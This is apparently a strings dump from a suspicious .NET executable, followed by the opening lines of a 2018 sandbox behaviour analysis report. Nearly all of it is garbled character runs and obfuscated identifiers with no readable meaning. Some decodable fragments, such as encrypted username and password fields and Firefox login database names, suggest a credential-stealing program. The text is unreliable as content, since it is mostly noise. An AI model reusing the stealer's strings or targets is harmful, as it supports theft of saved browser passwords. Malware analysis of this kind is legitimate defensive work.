'5ZelP8KQHapQULDISs1jIfgnXuroRcs7N9H0g04
U+sO
d~mr
]Kx/)
zfdITWzQDXfORQLZzYrec4pZ
F[MHDCERVZ^YPHUBQQRE
Ro~c
9Z| =
0q,R
ZfmlA
c4AA
kwwoceCXOwJcghViuFMGNui2zm9Z83
q_)3
c2.*
'tMx
}o@G
Drc\reyr{Xu}rtcDrtbe~cn
j=x
bQDF
MessageBox
Yrare
Erdx{arRaryc_vys{re
Erdx{arRarycVepd
dFOhXbmG3rjv4W6SC4TkbxATRMq1N
1jR?S
@~y{xpxy
DcbuTxsr
Rotrgc~xy^yqxezvc~xy
ErdxbetrZvyvpre
;xrhu
[dv^TengcBygexcrtcSvcv
7V16bm2IcdMaEMBKL7R4h4Oi5cspC1g8
[3?.[3W
THr,
zCngr
Erp~dcen
;+2X
r9Dv
4lfH
O}tq
get_Item
RuntimeCompatibilityAttribute
Qxezvc
bbId
Dcvec
&uSu1r2jd5T5gVFo2PGUnSw0yzhZgFawSHPG4Gn
:.;T
+U;s
+<e*2
8W 7
5)?T
prcHDcvysves^ygbc
Gextrdd\~{{re
cHD@
ybzuncrd
9c'C
a%9'9"' %
cfAD
;8H{
veVeevn
Rfbv{d
"5/`:
V{{xt_P{xuv{
ccg-88dt
M}GO}^q
6-H@
S37_G
<x=
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
I}2q
5au@
~i?,
jL?@
kj=O
FEEE
ea$E
prcHTbeerycSxzv~y
b\ z
%SJeit1srJvwsjxGQGiCc1hBNEeQH8YsZW6Zkk
O}uH}Zq
u3cLccg7xL60QBqKLeRT
SRUBPHRARYC
n8{^
$7yc
prcHZv~yZxsb{r
Oe .
! *ki
Y6Yh
9hm@
V{{xtvc~xyGexcrtc
Rotrgc~xyErtxes
7777
2'%Oq
BvKwmuQ41a7eWTVZ0Qcpcsiv3F
cQAA
B^yc$%
.J7c
_v/
N}KO}SH}cq
j!'#,
DDDD
4Iy04IZh5gVm7Z8OFSLCVlx
px0
^y}rtc~xyZrc
J.M7=
60I`
& _u
8qkp P
^ _{
o,E%i
777777+DcxgXy^s{rRys)cebr+8DcxgXy^s{rRys)
]P<c
8Da0F&
"RJiXxGPPUZRtx54RSQu8Ez3suaeRpYGKCU
>4C
IDndcrz9Xu}rtcLJLJ;7zdtxe{~u;7Ared~xy*#9'9'9';7Tb{cber*yrbcev{;7Gbu{~t\rnCx|ry*u v"t"!&.$#r'/.KDndcrz9Dce~ypLJ;7zdtxe{~u;7Ared~xy*#9'9'9';7Tb{cber*yrbcev{;7Gbu{~t\rn
[xvs[~ueven@
L\%rzN
@@D@
wT` 0
A@~j
.\N7
hr_K
b}]2
Dndcrz9Tx{{rtc~xyd9Pryre~t
Qerr_P{xuv{
Erd~mr
{rar{
PrcZrc
Gxecvu{rRortbcvu{r
c?. C
0 <k
$oq$
Nkh}
` i
A~ecbv{GexcrtcRo
cd7Erdrears9
B.Gp
N}mq
}"E21&
>,h*
O}dL}Kq
vK|v8/0
q,SZ
O}Qq
r'Pb=
dcbu
c8@}
O}RN}Zq
ResourceManager
Show
Tervcr
, z}
cy@$
x=WM
PropertyInfo
7COpGBxNZdr0I9A04K6fLRewKq
HdD
L3)Kl
Zved
_rvgQerr
C3/@E
b5.J
}%HLm
su&_}PPu
J 3
F@@@A@@@
Q>@)
$yXQJMU8lRpiofuKL2YP3C2gDpqx9wOTaktVI
r|W#
Rotrgc~xyVsserdd
#:A
is@.
c3D}
,R b0
c%.i
O}uq
lX3u:
PiJ'
X*@
V{pxe~c
E~}ysvr{
HIJL
O:'6
d$H#
7uq_
Assembly
T'*(R
2v/V
^d^yDcvecbgQx{sre
_VD_HAV[BRD
s !&
M}cO}v
LmVkQ
AssemblyCopyrightAttribute
<[3GEF@
:+b;
c$@$
8%,-
Z&Q6
T/2
&KBbVpm1uUjVdRZ0W03rEKRlnXQ5PPAuTvXQ20r
{37A$
Dndcrz9Tx{{rtc~xyd
6mn30
K3Oi^
NN.b
DrcVgveczrycDcvcr
O}~N}yq
Gexcrtc~xy
;Z|X
3%U
-7pK
O}bI}{N}nq
VtrQ{vpd
K#/
gextrdd^yqxezvc~xy[rypc
ySrubp^yqxD~mr
6M 1
~d7gexpevz7tvyyxc7ur7eby7~y7SXD7zxsr9
Cngr
TervcrDbu\rn
Erp~xyD~mr
s0^#
cg!!D@(
N};q
Byare~q~vu{rTxsrVcce~ubcr
G\&&HT
TervcrC
OAAq
s9}L
Erp~dcenAv{br\~ys
AaRvh&
ceDG
fFfMsFluXwEV3B68HTcD4cVC
b!.R
sM7B
3YAWbmMpz9fvIOUcnefnBRkrxh
Mgrg
kLMR;
F[MHARED^XYHZ^YXE
'HI}
bdWs
qBy~txsr
%fDQ
ovY5
BSJB
M.jr?
Exception
rBYVRs
A%^]j
N}'G
b$Q,b
Srubppre
$|^|
drcH
1y&
TKK3
bz}&Oq
-+hC
}=Oq
PrcSx`y{xvsre^crzd
vh3;:
z(2i
O}Nq
kSmm
S3__
Rrqn
Dndcrz9Drtb
s{{yvzr
4Dce~ypd
OYi>
|reyr{$%9s{{
7777+8[xpxyCe~ppre)
,7!}
W?jz
lr5cVqjpFXm9pYCHbYMGKbc5l
Z^YXQQDRC
I}dq
prcHQ~{rYvzr
w^Ru4-
GextrddZxsb{rTx{{rtc~xy
O}Rq
CF )l
\o_z]=
S3?BG
^8'-
FJ!R
mscorlib
drcH^dUvt|pexbys
Pryre~tDrtbe~cnSrdte~gcxe
#Uzcgzcc4KAVplqzdLRNvHgcAFMHi5c2TkIq
df{~cr$Hq~yv{~mr
fpsVe
=WW^
777777+Bdre^s)2BDRE2+8Bdre^s)
[3?E
OJR~u
w:;.
-|U2
+{;.!l
VFDA
^< mJ
'9<>[;(
drcH@~ysx`Dcn{r
YIv5
JeXBL
O}@q
y@mzX
Yroc
7l=
/$u]
#=%y
O}7M}Eq
F@DD
TervcrQ~{r@
`Nq,R
{~y|
c_@$
s`YbzureXqGextrddxed
Rytxs~yp
GetProperties
gKpb)
&01:
Lcd1gOp2Zvk38uT6IuJeKKsxdA1
Avb{cQerr
O}KL}Cq
System.Reflection
VG$%bD
NvpdC5WzK16eyMzfSyy74amrVc
N}2O}dq
ur2=`g
[E/H
'>l+V8:
KLP4/
M`ErdbzrC
73X
I}bN}
#x(qb
O}dq
Erq{rtc~xy^yax|r
EjMu8yPQLz0hl4S95gsC97M
crA$
h30lKkb8UDv08umSC65izoJCz
TxyqbdreRo7a&9'9'
TZSVepCngr
ervsDcvec
6HIJ
0bH2
DR[RTC7rytengcrsBdreyvzr;7rytengcrsGvdd`xes;7qxezDbuz~cBE[;7
"]-j
H+}`yn
+GextrddGred~dcrytr)uHH#
k3'R
H>C 0F
ZnyQjfEtCEt
Drtbe~cn^sryc~q~re
JZZ7u
{gZvo~zbzVgg{~tvc~xyVsserdd
X![ "
Evysxz
bdreyvzrHav{br
@~ysx`dGe~yt~gv{
PrcU~ysre^crzd
Uex`dre
s~tc
Ebyc~zrTxzgvc~u~{~cnVcce~ubcr
Zrzxen^yqx
AWGD
9eV"=N
DrcVcce~ubcrd
c33H
ccg-88
A!As
GVPRHE
*Eb;
b AA
^ -GMG
RfY Y'}RH
}2O}dq
N}Hq
L%u>
gextrdd^yqxezvc~xy
$bJA
Vgg{~tvc~xy
DTtT
bjWz2rrV4bOM1u2fXgCc
O}vq
.4|>
B}T!F
rytengcrsBdreyvzr
HT ?
7777+V{{x`DcvecXySrzvys)cebr+8V{{x`DcvecXySrzvys)
`g @
TervcrGextrdd^yqx
RVS@E^CR
9R!R
SvcrC~zr
J>YnV^
Dndcrz9Drtbe~cn
vE`#
|fEH)
FN6:q
prcHTbeeryc
*LN*
BY[XVSHS[[HSRUBPHRARYC
Z."k
yDFvNi9xXd8V5h50K7jy3EezfC6
zbW4Ym
t~i
drcHVepbzrycd
O}xN}yq
Q EL
L}vq
Ebyc~zrQ~r{s_vys{r
"^*K
H;b/
@v~cQxeRo~c
EGFAD
O}=q
4UQ
U~ysreDcbu^crz
ccg-88```9~udrydxqc`ver9txz8
SDA@}2O}dq
DcvecbgGred~dcvytr
x{r$%9s{{
.>xB
get_Message
!This program cannot be run in DOS mode. $
PrcU~yvenQxez
Rotrgc~xyQ{vpd
,[3;
4U{xu
[^ Y
ce@}
Xytr
ebyzxsr
FDDDDDD
IMF66wotZeV
yGMP
S3CT_
}dOq
+'b/@
1NK9f T
Y{ZA
C~c{r
'LjWzvrU7BgWe0o9umdqi7M1YXfWJF6fn136IXGm
O}Aq
X;fU
rvN;o
.1xe
xdcyvzr7QEXZ7zxmH{xp~yd
Txytvc
cqFsu9FGUL6TR8dIRZXeqj2
:XCd
D~mrXq
@v~cQxeSrubpRaryc
wx'3%
/Z')
zdatec9s{{
20Wx6J8QggPAi1ZDyIOmJUlhg1
d~mrTxzgerddrs
$L}%H}9M}sN}{Iq
DCBU9erdxbetrd
{}sb
WHILJ
4l1mH
4 5JMz
Ce~g{rSRD
7{.:^2<
'Gw'
RO^CHC_ERVSHSRUBPH^YQX
c5@}
@evgYxyRotrgc~xyC
UKpl
O}eq
oB4h*)%
,k3+
cq@@
z@(aI
K9*<
=e-4
3wOhxfUSushMOR8cvr5pVQbGrIJwp1
C kyY}
Q+z8
c_AA
AX[*
WBDA$
prcH_vys{r
Ei+4
prcH^dVccvt
ervs^s
Dndcrz9Zvyvprzryc
rEP~
n2TnIRAvCZU
77+Vtc~xyd7Txycroc*5Vbc
`y)]}
L}Xq
o)wZ
"7kl3glvPXmexZfxdqtWUNUNs8j4H71pya9
?= 2
fQvW4xQHT2ZWKO0GQLGXf
BY[XVSHS[[HSRUBPH^YQX
UVr8fv5uaykzYj4ZAY2NKew0o
"C1)D
Dndcrz9^X9Txzgerdd~xy
O}Sq
BMwvoiVqS7gV7H01vrK3
C3#E
^y}rtc~xyCngr
Dndcrz9C
}6v/
s`Z~{{~drtxysd
r7urccre7->
PrcSrubp^yqx
{gDcvecVsserdd
77+8Vtc~xyd)
{gZ~y~zbzVgg{~tvc~xyVsserdd
(qBq
`l_:%
T(6P
90^g
ErvsGextrddZrzxen
}AHl
ZvyvprzrycXu}rtc
>vU21/C
sr{vn
7777+8^s{rDrcc~ypd)
Sp-KV
7777+8Ge~
Qbt|va9eb
!7zmQZenziAc3r2DHdr58ZnCpDN8Nj2o5q
hFig7hKp3Tlx1G8bwI0N7
XNFLi
\L
}TLD
prcHDcvec^yqx
7777+S~dv{{x`Dcvec^qXyUvccre~rd)qv{dr+8S~dv{{x`Dcvec^qXyUvccre~rd)
dmxx
@2PcG
^yc$%
xe5)
Jp@<
PrcDrcc~yp
S~dvu{rTZS
mN"wB
S~dvu{rCvd|Zvyvpre
.v1p
IhB5x9X36T5iBW7IosQvntzcZ3RIeAPv
gextrdd^yqxezvc~xyT{vdd
?y6(
|g?Q
n_E'
Prc^y}rtc~xyGvc
L}zO}vq
Txyq
Te~c~tv{Gextrdd
Zxer7~yqxezvc~xy-7
d$\k
PrcDndcrz^yqx
Xf9+sC
W9svcv
n X[
SePr
|O@c
M`ErvsA~ecbv{Zrzxen
s3(D
@&~$
prcHTbeerycC
Erp~dcen\rn
#^V&
PsG}
!AC3
VepbzrycRotrgc~xy
ZEnI
7777+8Rort)
Erg{vtr
-rR
{yi,R
{<vP
.E9L
cUD}
e5AP
f;m\
3qEs
b419B0FjZSRpcFGYw6SEq88mtvI64C
N}rO}Vq
tCj0gRlwoFhHFA4hhnXrncl
PrcRya~exyzrycAve~vu{r
Nb3G
z\AO
O}%H}Dq
MethodInfo
FFFFFFEG
}zO}{q
3cU
q6r`
c|G,[w
$3IaJWlajMmCLtkEuuudrY9zTuJfBATeZ1sXa
txbyc
S~v{xpErdb{c
{%Ei
O}cq
df{~cr$Hgergver
4VVXaQXcZ0nn3H11WIy0voZ5ZKoL
rkWZx
By{xvsS{{
Q.Y9
veevn
pPj2
<5sO
prcH[xvsS{{
ryc~tvcr
J4(#
+yL@
])ep
U0<%
ervs
Kt0j
FFA@$
-r=-m
b~DA$
#GewpXUq3QhUNK5Nttnxau3B9qIe6JbIw3yw
O}Tq
1GJz
df{~cr$Hdcrg
{gUbqqre
[3+F
SUPHROTRGC^XYHYXCH_VYS[RS
cCi*
Snyvz~t
Gextrdd@~ysx`Dcn{r
IS(I
^j%N
89S-
&s*EJn
N}cM}gI}vq
@e~cr[~yr
HIL$
O}qH}2q
g}T< 6
c%@$
YO=o{
Py|}
hWyqfzL9dOdh13oDmiGXVz3ByZ
ZvyvprzrycUvdrXu}rtc
G/tR
^/.$<
'9\G*
O}Bq
ErvsXy{nTx{{rtc~xyUvdr
H}^q
Dndcrz@~srGred~dcrytr
X1Es
TxBy~y~c~v{~mr
6e?|
gextrddVttrdd
s`Txyc~ybrDcvcbd
Lv{2
DRT^CRZHQerr^crz
prcHGextrddYvzr
>g>P
Sx`y{xvsreZryb^crz
\r,x
M}zq
O}eL}rq
Nw\
ZP8Vmuy52aqsILAO1pOUAYlXY5bl51G
{gUvdrXqS{{
bcsx`y
Xu}rtc
nJSXcJmVfS5uje6GqkFLSQ2c1dCm
d79<
}DNG@
A4cQ
JriK
Srtxzgerdd
k%.m%H
qC#m
91Ew
%BRGZeEm8N1lmsCnCb1UlN4v50eS6PtRZpYVb8
[3?BF
M`V{{xtvcrA~ecbv{Zrzxen
'C{]a
q~{ryvzr9ror
P/IXE
3;sV
@BtF
5b?&
df{~cr$Ht{xdr
9v7f
2'/Oq
)H;j
D}tO}-q
T*33*
D~mrXq_rvsred
b\.R
pRn+
erX0
K3Oj
!9?l
7YKE+
O}vM}~H}Sq
gOy 0
@e~crGextrddZrzxen
#LHIJ
tF5u
AssemblyFileVersionAttribute
p!;8
c(@D
VG$%b
"esK4zZWrS4wqugBPh7HhbV2TxhkFcIsut7
[3'GF
}DO}xq
prc|reyr{xu}rtcdrtbe~cn
xu}rtc
FAAA@AA
7777+Zb{c~g{r^ydcvytrdGx{~tn)DcxgRo~dc~yp+8Zb{c~g{r^ydcvytrdGx{~tn)
k3W[
g`e#$A^YO/]PUV|[ZM@
cN@D
C{ywI
B EA
Ec{YcDcvcbdCxSxdReexe
%rcq
O}xq
In[N
SD#H
DA@}2O}dq
nfUUC
I @
HQ$B
\I&=
,8O6/
ZrzxenDvqr[xvs
7777+Dcxg^qPx~ypXyUvccre~rd)cebr+8Dcxg^qPx~ypXyUvccre~rd)
vmIT
c3?_
gV a
CompilationRelaxationsAttribute
YDDH^y~c
=u :~Wz
DcvecGextrdd
Gz2 T
!qa
biVbzWBaKeTcOfV5Ut3W
xgHRfbv{~cn
[xtv{Zvt
_rvsre[rypc
p Qr
3W'&%$#"! /.VUTSRQ
<LI,
txzgerdd~u{r
T{xdr_vys{r
A} }
prcHDcvecbgGvc
aPO'
s`[rypc
@e~crQ~{r
Cx|ry*u v"t"!&.$#r'/.GVS
zdtxe{~u
A} N
^pGAH
N}Dq
<[3GE
Dndcrz9Drtbe~cn9Ge~yt~gv{
%IR%
vssHVddrzu{nErdx{ar
O}cI}`q
O}eI}{q
NHIL
ervs[xtv{Uvdr
_vys{r
{3Hy
777777+Eby[rar{)[rvdcGe~a~{rpr+8Eby[rar{)
77+8Drcc~ypd)
DA@$
! Gv-?#4c_
?A}=O}9q
String
_CorExeMain
O}Cq
x +l
/~C-^
(|El
t+T#
;@&&
} @q
CDA@}2O}dI}KL}Zq
DA@s
7u_J
DA@}DO}xq
WDA@}DO}xq
DA@}
I}yq
TERVCRHC_ERVSHSRUBPH^YQX
CxVeevn
Urp~y^yax|r
_rvgV{{xt
NHI$
8~E~
9ttcxe
@e~cr_rvsre
c)@}
L,Eo
rZHZO8DhciVwxgcnjRGPpBsd3l6FF
"Z)j4
'cOjWisoLC449KqXIhyJApG0y8f5faG9PBIh3ljn
n#iI
UnverifiableCodeAttribute
LJs!
gJ7aIAA1Fr2DPH6fDk9AnHDTHn
m*ZcN
e[;,
O}~N}Kq
TelDFqzsqBlbbIWQUaszZ66dyjyRSjw
FFDA
?acg
$jpKDzgBKP2hfxNXuzjMGlVqVjgrRLwqqUp4b
6 fgr @d
%n0gvj9Naz0MJuH0DprwqIXUjsOZowTfCjPQWt
xsCngr
777777+Ryvu{rs)cebr+8Ryvu{rs)
M7Xg5hv/
PrcCngrQexz_vys{r
?auaw]l
D#C)z[
[1ZD1
77+Vepbzrycd)2VEPBZRYCD2+8Vepbzrycd)
}=O}9q
O}rI}|q
G@nc
TxzgverVeevnd
txyc~ybrsrubpraryc
H}Kq
O}|M}vq
J'UZ9
Avb{cT{xdrAvb{c
=n\8l<
&Wqt
HubMc
M.#k
s`GvprD~mr
}9D4bZ
edfI
KFpQ
zdtxerr9s{{
drcc~ypd
Avb{cRybzrevcr^crzd
TbeerycSxzv~yHVddrzu{nErdx{ar
ApeY
[3+<[3
zleb57XKvYy00Yn5RIwLFz
O}yq
gextYvzr
s`GextrddxeCngr
{O<$^
CHR
MLrKMrOuD3LlmhI1VQVECzh0rkBNYd
Dndcrz9Erq{rtc~xy
5gWK7J092CXIhwEYKAshpKQs
Qv~{Qvdc
So6TTIcTaP3AwBsrEkl3U870Z03NVf
YDDHD
Rotrgc~xy
78_A
+(oz{7ared~xy*5&9'57rytxs~yp*5BCQ:&!5()
ntlJxLPrAB8aGxhhfZ9wYTk
ukpqPZCKnoZCUXhlburcYVd3Zx2AJBE
35;^
M}{q
EBXZ:G
O}gq
Z~texdxqc9@~y$%
H}yq
Tx^y~c~v{~mr
DrcAv{br
prcHT
TxTervcr^ydcvytr
w,!z
c7.
@VWg
YcDrc^yqxezvc~xyGextrdd
2'%O
Object
prcH^crz
79 :
Jl2R
@ZHT[XDR
jLlc
W_t
N}xO}mq
AAFGE
N}[O}~q
Hb| c
SI~b
H>#'P_
qqqqqq
Mrex
a)f$T
^y}rtc
O}
5d0x
K^G#
%oMg
)=\'c
`U t
I}~q
sr{rcrq~{r
dcbu9ror
.z)#<
c0@A
6U[Y
O}rL}gq
F[MHZRZXENHDVQR
omM7$
O}2q
}{Oq
wm~
5%N\
Ervs
YCLjipM1OfWwKtRVGk6T4uF
"4OjHwwTgCmaTA2mLpEC7QfiF6jYPEoINis
hO?
SrubpDce~yp
;^wck
Dndc
eHq,R
S3[G
?q,R
5]an7'
yQpsYTnZpWgeZxIaeKLauL
9`~O
}yOq
UncrVeevnTxzgver
S3SGF
prcHSrubpDce~yp
5 KA
_$@r
j8UFBUGFwfFTF2P8gmnpCaAp5xpYsl9w
q&c>
Txzg~{rePryrevcrsVcce~ubcr
I}xq
Dndcrz9Ebyc~zr9Txzg~{reDrea~trd
O}Vq
P#(}
}$Oq
<C3GF
Prc\reyr{Xu}rtcDrtbe~cn
8L!0T
El3uyK
N}KM}Sq
|M/]l
iS3aJp7TXYE99PiKrxid
)G21/
0Ai$
} OT
Erq{rtc~xy
X[RVBC$%9s{{
c>}9I
#AXRJdwRswEfQSTlqBbURY1unvLEb5WLfDYe
prcHZxsb{rYvzr
.S3/
N}~q
srubpvtc~argextrdd
} AA
lBQh/
drcHAreu
GVPRHRORTBCRHERVS@E^CR
cXA}
[3;F
prcvsse~yqx
S3WEG
TbeerycBdre
lW~
vCm2
ntf&cG%aDrvxp}"uRBQmF~_C.sz\Ty!bq odXN'
Ec{TervcrBdreC
@r{{\yx`yD~sCngr
O}Dq
Dndcrz9Ebyc~zr9^ycrexgDrea~trd
S~dgxdr
df{~cr$Htx{bzyHcroc
ym"
dj(-@]"
prcH^dV{~ar
s`Xrz^s
uF::E
[t!R
GC_ERVSHDCVECHEXBC^YR
LwW UC
#7p|
Mx0qes6dWvXB87DCX7OtKeqxIkk2row
tv{{uvt|
}vOq
c1 \ ok?
cS}II
[~dcw&
Lk]d
}h:*z
[NzT
GGGq
gM75
qgwExl8552FgqWdMM90GTQtzisPVD612
O}cH}`q
,2V,f
FT\Z
}rOq
{Y#U
U{xt|Txgn
N}XO}$q
a 7Xn40Y
System.Threading
s`Ro~cTxsr
|*n
}9I.J
Ec{Drc[vdc@~y$%Reexe
(&\6
)aredb
Q~{r
' |45
z)FX
SrubpVtc~arGextrdd
rzvd9z~texdxqc9txz8`~ysx`d8%''#8'%8z~c8cvd|5)
Nv`q
gM7r
S~dvu{rBVT
av{brHH
|u'.@&
VssCxDcvecbg
7777+EbyXy{n^q^s{r)qv{dr+8EbyXy{n^q^s{r)
O}tL}|H}rI}Kq
PM^G
vm7p
{gq{X{sGexcrtc
vyprMxyr^S
i FG
$ u;-
R)Pt{
]_Th
+j$ge:
qx{sre
ZTQw<O
c>@@}
o _TH
E~g^yqx
O}eL}rI}KM}@q
+Cvd|7ared~xy*5&9%57oz{yd*5
V{`vnd
z/sQw
!JLH
0W[B
PrcGextrdd_rvg
$+",1V
.m7bZ
vl"%
jZUJC9OO3KkMIOhHGpMQoP
A@$
Prc[vdcReexe
ssEs
7777+Ge~xe~cn) +8Ge~xe~cn)
^wxs
rt|BdreGvdd`xes
mv #%
aFr_D
eC 6
jf92
y[rypc
Bgsvcr
;e<8
cqCi
O}zq
{rcrQ~{r
zrzxen~yqx
0~du
ZPjwGE164Pb5urYbKsaDMP
rytengcrsGvdd`xes
)WKi
prcHQb{{nFbv{~q~rsYvzr
D@@$
Xd]<m
}UOq
[vdc^ysroXq
bZ.{3SjP
;BEG
777777+[xpxyCngr)^ycrevtc~arCx|ry+8[xpxyCngr)
o$u"F
g83"
}9O}mq
:?>ow
VX f
O}xN}uq
O}xI}cH}qM}rq
3LRKfZSWOLZBuZF1lnPIzYtRoQ
HILJ
FDA@
]\U\v
ROTRGC^XYHSRUBPHRARYC
N`Z>
U,kz
2.*x;N
cBD@$
#yNmg0IQBoomLiVIbbg79l6hi2JmMJX33xjq
8imfXO
9_MS{
18FA
/F R
D@@@
prcHTxbyc
,sc:
];s>|
<]xOe
%gcduWu8HODcWcZsb3nikYCAhHg9cLk2C9f8vj
Vyc~Sbzg
v2.0.50727
1sk
7777+8Erp~dcevc~xyCe~ppre)
?f T
ODDq
gexcxtx{
][~ueven9Gxecvu{rRortbcvu{r
QxDc7
get_Count
Uncr
TxzzxyVtr
\REYR[$%9s{{
5^_x
77+8Ge~yt~gv{d)
+)tHHS~dg{vnT{vdd/
ILc _c
.k3#e#
ubqqre
ErvsUncr
*N,2+
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
C3g_
cPA@}
O}UH}7N}vq
Mp/[
,0q3Q
+ e
C3'@E
7 Uqd4
c D}
c(XD}
c DD
5zc
sPvv
GetTypeFromHandle
O}xM}:q
ycgexcrtca~ecbv{zrzxen
@D%H$%9s{{
VggSxzv~y
'g!a8a
8H!e
VtrFbv{~q~re
DT B7
7y,I
q~{ryvzr
'SCFYLLSclzE1jCmFXRCVEItIuzlvJDPXCxCD4LK
+Dndcrz@~srGred~dcrytr)uHH!
xsSr{rpvcr$
xsSr{rpvcr&
G|%)
"?3W
r7dzv{{re7c
Zxar
tA7MxlPngPXfh7HfI29Ty7MXHOIARY
E :s
`v~cqxesrubpraryc
ZvyvprzrycXu}rtcDrvet
D{rrg
a~ecbv{gexcrtc
Ers~ertcDcvysves^ygbc
Cx^yc$%
Q!![C
xsSr{rpvcru
Y7N)Lh
xsSr{rpvcrs
cTAA
Dndcrz9^X
Ebyc~zrCngr_vys{r
}/O}9q
O}rH}yq
77+Erp~dcevc~xy^yqx)
hbFX
7777+Ryvu{rs)cebr+8Ryvu{rs)
~d`x`!#gextrdd
s`Srubp^yqxQ~{rXqqdrc
A~ecbv{Fbren
O}{q
14UQC
A}=O}9q
Oh\
xhab`
F||uv{
{gYbzureXqUncrdErvs
3M7H
77+Drcc~ypd)
777777+Txzzvys)2TXZZVYS2+8Txzzvys)
Ro~cC
$w4P0ePlzggnfJ4sWKPpe33cSFnw8SYXxDvy2
mo[FB`W
O}[q
O}KN}nq
)2j}O;[
sbkU
Dcervz@e~cre
System.Runtime.CompilerServices
DcvecVsVsz~y
O}eN}Gq
O}yN}qq
|! L
}KO}Dq
s?c-
1R1Es
-nd?
FDA$
1b;RP
3EIE08
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
fCf&
Z-Jv/a
CR7C
N}vO}gq
ZvyvprzrycXu}rtcTx{{rtc~xy
drcHBdrD
_DA@}2O}dq
ZAqzA
s`Gextrddxe[rar{
!LD=f
ZrddvprUxo^txy
"a|!
(k iG
c1@}
"auF3IByYz7RFK6fNbpfmzEYl7hE1gFF9os
7!uA
DD@D
6l);
[3o$
XBCGBCHSRUBPHDCE^YPH^YQX
^d[xpp~yp
c"@$
cW@$
a_HS
BdreYvzr
/A@}
prcHZrddvpr
4bqV
ohP$
<{3?
A~ecbv{Gexcrtc
O}%M}Gq
bU!pw
IHLJ
/S/q
HSxd
prcHBCQ/
"0.o
8&-@
Avb{cXgryAvb{c
Dndcrz9Croc
DDDD}
7)c
T{xyrs
r 8U9
C3'GE
CDA@}
Dg{~c
'e\I&dKk
O}~I}|N}eq
S~ertcxen^yqx
EbyGR
AssemblyProductAttribute
O}eL}rH}Qq
CxDce~yp
7777+Rort)
B8FgCBep1jkNDUWYSFu5OHm4mPIfx
&1b9
av{br
4}>K80
S \
%GCig3lCOZ9Ap8orT9otOspQZxOZ9rjwhERvpl
~i4j
vD3U
i b {
kIGN
HA'bk
D}2O}dN}Kq
I}nq
7@@@@
2N4GWDTnDddSdz7MRJGkKSvVR
vyprCngr
ZVT*2'%O2'%O2'%O^YDCV[[*2'/O2'/O|
RDWs-
cJA@
:Tt7
S|'j6
drysre
pYY
"KWws1gTgmTbtAn0yCc8SYBNlp8uVhKf58f
&gEZhQepgXA3E9XJ0I53Q62QfzqE7wS45id7Y9q
O}Xq
8Ml4"
ZrddvprUxoUbccxyd
ryVav~{vu{r)cebr+8Dcvec@
8HE}
M`Fbren^yqxezvc~xyGextrdd
cT@}
!R175tTKEBCDhDBLitcTBUHHZ6ckZd3YXA
}bI}
`U^,
#Vtot
WZb{
L;%<I
yvzr
xgHRog{~t~c
prcHRo~cC
M}7q
#GUID
UvdrVsserdd
Oh#@
N}xq
OsI~U
SrcrtcDvysuxo~r
D#!98
F{cG
Qvdc@e~cr
0-n_
WTWxRZZH4CWNWnNyuIIhloR7jh.resources
L6?H
.j c;
b-*~
Txgne~p
^y}rtc~xy[~ueven
)-chA
PrcR{rzrycCngr
O}7I}ZM}~N}{q
7777+Svcr)%'&#:&':%"C&#-% -##9/.%.'% +8Svcr)
-ml+c
<k3;
B@Jz
AAAFGE
txz9
kgjY
K3/< 3.
K3O,
|tk
{WJk
OJ$D
7777+Erp~dcevc~xyCe~ppre)
Zg4$
Q}g{%B%

T]%lk
N}dq
O}eN}Dq
M}vq
59bk
s`GextrddxeEra~d~xy
dxbetr
Nhp2DQMNqIjN1URBx9LcQBlCY
PJ~H
Gvdd`xes
TervcrS~ertcxen
h7xJZV3dC5Wcv7VdfNTUjbglTB1NJ
K3Oi
Iv/&
4PB^S
Txyarec
#XtKxZq7ONNKa6b5WmKN3Px9gAfrKz6ArU7h
Gvevzrcre^yqx
dreare
Zxsb{r
PrcAv{brd
;tU9
L}eq
EbyZxsr
/ 3b
H.5G
pl1@
ex`d
#DA@}2O}dq
;l"I
&ZqGQ5B9xIBeGVHFj14iP7fGOxTZRrSyAyIsPTD
*{;B
prcHTervcrC
PrcZxsb{r_vys{r
9Aw@g
Xw 4 K7
NNc%@
qOZeDlM0JY6SP6LdjEkEKJ
clD$
M}dq
O}|q
cp?
c$b[.
7777+^s{rDrcc~ypd)
N1rq
yJcYpOcW3m69ulu63cyt0OpUqz0Z
uO
qve~
VoLC
77+Ce~ppred)
rsVyxynzxbdZrc
58s2Xi9HPdyTeF5BOClNvy24OxAsJ76Z
xc8iIO2GNsXVzHl1cdgq3FLw3oK
2#$@
Q~{r^yqxCngr
cJ@}
[3KEF
U>@E
C3w_
lPY:)
c>AD@
cfYc=Yc
}=O}Zq
c]XW
s`D~mr
77+8Erp~dcevc~xy^yqx)
+YKb
a$Hg
O}{M}7N}Cq
Ro~cGextrdd
svcv
@e~crV{{Croc
BYTXZGERDDRSHRYS
/y^|
GVPRHPBVES
ebyy~yp
gvdd`xesHav{br
t 8T~ .
System.Collections.Generic
DvqrFb~t|[M
UA L
Q~{r^yqx
G{>>
7/D!
yEoE
ryVav~{vu{r)
0apJicy2NN93gDoze3uYG91EmXbBhW8
System.Windows.Forms
6bppfsjCB3nfFQU8tknN
,^ Ns
Yr`^zvprUvdr
1]W25
Yh=8
NNA@
gLWIQWIiih4SCplMelSiDF
{g^zvprYvzr
O}Gq
<S3GJLHI
y {|T
VTd-
|ya
HTxeRorZv~y
5p{C#
#e5iPs49ZmFK8STddof30LJdxblmGFN73ZGb
rz9@~ysx`d9Qxezd
`1F@
Srqvb{c
C4tpyxQIIFSOHhP1oMCRGoGE6RkIa
xsUvdr
eYc)
:! O
JV>D
?.)
jBJtPNgWQ26SupUl6Q7Tt1BjQP
5alMLt7AVXHnnV7HsvcVAmEaiZdb1w
#ExPf9ffanwOYSSWooGwDp9yAgPp1DEiVlHV
{xtvc~xy
[3/@F
xe~p~yHbe{
"PDAy8j9TTfD94RWKjGOE4O7x8dDIrVyXjp
^Rybzrevcxe
e*xz
.H?K
Y.8[2OG
L}~q
prcHRortbcvu{rGvc
.C3;a
N}QO}{q
Sleep
bsS[$mr!b 7
gextrdd_vys{r
k(FN
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven04_64 Seven04_64 VirtualBox 2018-09-09 19:20:30 2018-09-09 19:24:18 228

21 Behaviors detected by system signatures

